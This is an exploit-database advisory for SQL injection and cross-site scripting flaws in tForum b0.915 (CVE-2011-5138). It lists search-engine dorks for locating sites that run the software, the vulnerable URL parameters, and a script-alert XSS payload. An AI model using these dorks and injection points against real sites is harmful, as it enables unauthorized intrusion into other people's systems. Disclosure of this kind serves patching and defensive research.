tForum b0.915 Cross Site Scripting / SQL Injection

2011-12-28 / 2012-09-01

Credit: snup

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2011-5138

CWE: CWE-89
CWE-79

Dork: intext:\"powered by tForum b0.915\"

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

# Exploit Title: tForum b0.915 Vulnerabilities
# Dork: intext:"powered by tForum b0.915"
# Author: snup
# Contact: snup.php@gmail.com

 SQL Injection:

 DORK:
  inurl:"viewtopic.php?TopicID=" intext:"powered by tForum b0.915"
  inurl:"viewboard.php?BoardID=" intext:"powered by tForum b0.915"
  inurl:"viewcat.php?CatID=" intext:"powered by tForum b0.915"

 BUG:
  http://127.0.0.1/viewtopic.php?TopicID=[sqli]
  http://127.0.0.1/viewboard.php?BoardID=[sqli]
  http://127.0.0.1/viewcat.php?CatID=[sqli]

 XSS:

 DORK:
  inurl:"username=" intext:"powered by tForum b0.915"

 BUG:
  http://127.0.0.1/member.php?Action=viewprofile&username=<script>alert(1337)</script>

===========
= Gr33tz: =
====================================================
= agilob, cOnd, czoik, drummachina, gocys, prick   =
= im2ee, MadCow, n1k0n3r, R3w, rtgn, SiD, vizzdoom =
=           irc.freenode.net #pakamera                       =
====================================================

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

tForum b0.915 Cross Site Scripting / SQL Injection

Dork: intext:\"powered by tForum b0.915\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.